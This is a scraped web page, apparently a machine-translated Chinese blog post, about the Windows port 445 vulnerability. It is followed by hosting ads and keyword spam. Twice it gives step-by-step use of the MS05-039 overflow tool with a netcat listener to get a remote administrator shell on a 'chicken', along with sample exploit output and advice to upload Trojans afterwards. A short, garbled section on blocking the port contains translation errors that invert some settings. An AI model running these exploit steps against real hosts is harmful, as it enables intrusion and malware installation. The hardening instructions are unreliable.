端口445端口(445 port)

445端口  时间:2021-04-18  阅读:()

445端口 445 port

Teach you 445 port attacks and prevention:

The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.

In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.

The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:

F:\445>ms05039 target IP local IP 1234

. . . . . .

. . . . . .

F:\445>nc. exe -vv -l -p 1234

. . . . . .

. . . . . .

If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.

Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:

1. port exclusion method

This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned

The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the

Internet (TCP/IP) property settings page;

Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;

The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.

2. service shutdown method

Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,

select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page,

And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.

Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:

In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;

Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the

bugs open 445 and 139 ports,

Scan with a scanner

Next, exploit a vulnerability tool to attack a remotecalculator

Open the command prompt and enter ms05039. exe 192. 168.0.3

192. 168.0. 2 44661

Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:

Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED

Maki ng, nul l, se ssi on. . . OK

Trying, to, bind, pipe. . . OK

Trying, to, send, craf ted, packet. . . OK

Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the

4466 port of the machine.

Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,

It will soon be able to monitor a remote SHELL withadministrator privileges.

So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.

NameCheap优惠活动 新注册域名38元

今天上午有网友在群里聊到是不是有新注册域名的海外域名商家的优惠活动。如果我们并非一定要在国外注册域名的话,最近年中促销期间,国内的服务商优惠力度还是比较大的,以前我们可能较多选择海外域名商家注册域名在于海外商家便宜,如今这几年国内的商家价格也不贵的。比如在前一段时间有分享到几个商家的年中活动:1、DNSPOD域名欢购活动 - 提供域名抢购活动、DNS解析折扣、SSL证书活动2、难得再次关注新网商家...

易探云香港云服务器价格多少钱1个月/1年?

易探云怎么样?易探云是目前国内少数优质的香港云服务器服务商家,目前推出多个香港机房的香港云服务器,有新界、九龙、沙田、葵湾等机房,还提供CN2、BGP及CN2三网直连香港云服务器。近年来,许多企业外贸出海会选择香港云服务器来部署自己的外贸网站,使得越来越多的用户会选择易探云作为网站服务提供平台。今天,云服务器网(yuntue.com)小编来谈谈易探云和易探云服务器怎么样?具体香港云服务器多少钱1个...

易探云:香港CN2云服务器低至18元/月起,183.60元/年

易探云怎么样?易探云最早是主攻香港云服务器的品牌商家,由于之前香港云服务器性价比高、稳定性不错获得了不少用户的支持。易探云推出大量香港云服务器,采用BGP、CN2线路,机房有香港九龙、香港新界、香港沙田、香港葵湾等,香港1核1G低至18元/月,183.60元/年,老站长建站推荐香港2核4G5M+10G数据盘仅799元/年,性价比超强,关键是延迟全球为50ms左右,适合国内境外外贸行业网站等,如果需...

445端口为你推荐
电子行业动态跟踪报告followgooglefollowcss支持ipad支持ipad支持ipad支持ipadwin10关闭445端口在win10 如何关闭445端口的最新相关信息重庆电信宽带管家重庆电信宽带多少钱一个月xp系统关闭445端口xp中,如何关闭掉一些没有用的端口,请高手解答?
长春域名注册 郑州服务器租用 linode日本 pw域名 php空间推荐 国外视频网站有哪些 空间购买 石家庄服务器托管 lamp的音标 主机返佣 阵亡将士纪念日 谷歌搜索打不开 空间排行榜 美国代理服务器 apache启动失败 WHMCS studentmain 大硬盘补丁 xendesktop 更多